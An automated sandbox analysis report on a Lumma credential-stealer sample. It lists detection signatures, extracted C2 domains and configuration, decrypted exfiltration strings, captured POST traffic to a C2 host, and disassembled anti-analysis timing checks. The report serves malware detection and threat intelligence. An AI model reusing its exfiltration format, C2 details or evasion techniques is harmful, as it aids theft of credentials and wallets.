Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1542964
MD5: 89eb026b1e8b37df60728d38b5ba98ba
SHA1: 20bef1ee48878b4b83d805f4b7d4c0b9b493f7d2
SHA256: 7e903a309497439f4842b480e73d0b8c71a01cc597d3127c8869f093465c2317
Tags: exe, user-Bitsight
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 89EB026B1E8B37DF60728D38B5BA98BA)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["necklacedmny.store", "crisiwarny.store", "thumbystriw.store", "scriptyprefej.store", "fadehairucw.store", "presticitpo.store", "navygenerayk.store", "founpiuer.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
00000001.00000003.1367227452.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000003.1312488858.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000003.1335200391.0000000000B80000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000003.1364978590.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000003.1348830892.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-27T01:22:10.970316+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 172.67.170.64 | 443 | TCP
2024-10-27T01:22:12.156140+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49701 | 172.67.170.64 | 443 | TCP
2024-10-27T01:22:10.970316+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 172.67.170.64 | 443 | TCP
2024-10-27T01:22:12.156140+0200 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49701 | 172.67.170.64 | 443 | TCP
2024-10-27T01:22:15.939960+0200 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49703 | 172.67.170.64 | 443 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: file.exe.6636.1.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "crisiwarny.store", "thumbystriw.store", "scriptyprefej.store", "fadehairucw.store", "presticitpo.store", "navygenerayk.store", "founpiuer.store"], "Build id": "4SD0y4--legendaryy"}
Source: file.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scriptyprefej.store
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: navygenerayk.store
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: founpiuer.store
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacedmny.store
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: thumbystriw.store
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fadehairucw.store
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crisiwarny.store
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0048D7F8 CryptUnprotectData, 1_2_0048D7F8
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49722 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.170.64:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49703 -> 172.67.170.64:443
Source: Malware configuration extractor | URLs: necklacedmny.store
Source: Malware configuration extractor | URLs: crisiwarny.store
Source: Malware configuration extractor | URLs: thumbystriw.store
Source: Malware configuration extractor | URLs: scriptyprefej.store
Source: Malware configuration extractor | URLs: fadehairucw.store
Source: Malware configuration extractor | URLs: presticitpo.store
Source: Malware configuration extractor | URLs: navygenerayk.store
Source: Malware configuration extractor | URLs: founpiuer.store
Source: Joe Sandbox View | IP Address: 172.67.170.64
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12849 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15081 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20406 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1242 | Host: crisiwarny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 581658 | Host: crisiwarny.store
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: presticitpo.store
Source: global traffic | DNS traffic detected: DNS query: crisiwarny.store
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: crisiwarny.store
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknown HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49701 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49702 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49705 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49711 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49722 version: TLS 1.2

              System Summary

              Source: file.exe Static PE information: section name:
              Source: file.exe Static PE information: section name: .rsrc
              Source: file.exe Static PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exe Code function: String function: 0047E190 appears 152 times
              Source: C:\Users\user\Desktop\file.exe Code function: String function: 0047C890 appears 69 times
              Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exe Static PE information: Section: ZLIB complexity 0.9981081014890282
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
              Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004A2240 CoCreateInstance, 1_2_004A2240
              Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: file.exe, 00000001.00000003.1314879408.000000000533B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1335626324.0000000005337000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1335495165.0000000005341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exe ReversingLabs: Detection: 42%
              Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
              Source: file.exe Static file information: File size 2939904 > 1048576
              Source: file.exe Static PE information: Raw size of fiufktgl is bigger than: 0x100000 < 0x2a2400

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.470000.0.unpack :EW;.rsrc :W;.idata :W;fiufktgl:EW;thfjtvjw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;fiufktgl:EW;thfjtvjw:EW;.taggant:EW;
              Source: initial sample Static PE information: section where entry point is pointing to: .taggant
              Source: file.exe Static PE information: real checksum: 0x2d6421 should be: 0x2dc1cb
              Source: file.exe Static PE information: section name:
              Source: file.exe Static PE information: section name: .rsrc
              Source: file.exe Static PE information: section name: .idata
              Source: file.exe Static PE information: section name: fiufktgl
              Source: file.exe Static PE information: section name: thfjtvjw
              Source: file.exe Static PE information: section name: .taggant
              Source: file.exe Static PE information: section name: entropy: 7.981472592877069

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B323 second address: 64B36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a adc si, F774h 0x0000000f push 00000000h 0x00000011 mov dl, 05h 0x00000013 mov dh, ah 0x00000015 push 737A224Ch 0x0000001a jp 00007FBBF0D5FF5Ah 0x00000020 xor dword ptr [esp], 737A22CCh 0x00000027 push 00000003h 0x00000029 mov dword ptr [ebp+122D38D9h], edi 0x0000002f push 00000000h 0x00000031 adc dh, FFFFFFCBh 0x00000034 push 00000003h 0x00000036 mov dword ptr [ebp+122D2A5Ch], edi 0x0000003c push 627A9B51h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 push edi 0x00000045 pop edi 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B36D second address: 64B3D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FBBF10EAAF8h 0x0000000c popad 0x0000000d add dword ptr [esp], 5D8564AFh 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FBBF10EAAF8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, 3EC18AF0h 0x00000033 lea ebx, dword ptr [ebp+1244FEBFh] 0x00000039 or esi, dword ptr [ebp+122D2CAFh] 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jp 00007FBBF10EAB0Dh 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C92E second address: 66C956 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jns 00007FBBF0D5FF56h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FBBF0D5FF65h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C956 second address: 66C972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBF10EAB07h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AB72 second address: 66AB76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B102 second address: 66B10C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FBBF10EAAF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B10C second address: 66B110 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B110 second address: 66B11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B291 second address: 66B2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 je 00007FBBF0D5FF56h 0x0000000c jmp 00007FBBF0D5FF67h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007FBBF0D5FF5Bh 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B41C second address: 66B428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FBBF10EAAF6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B428 second address: 66B42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B42C second address: 66B432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B432 second address: 66B43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B43E second address: 66B442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B80F second address: 66B815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B815 second address: 66B81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6630A2 second address: 6630A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6630A8 second address: 6630BC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBF10EAAF6h 0x00000008 jp 00007FBBF10EAAF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6630BC second address: 6630C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EE31 second address: 63EE5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FBBF10EAAF8h 0x0000000c jne 00007FBBF10EAAF8h 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FBBF10EAAFBh 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BAE1 second address: 66BAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BAE5 second address: 66BAF5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBBF10EAAF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BAF5 second address: 66BAFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BAFB second address: 66BB05 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBBF10EAAF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C0B6 second address: 66C0BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C0BA second address: 66C0D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBF10EAAFDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C0D0 second address: 66C0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
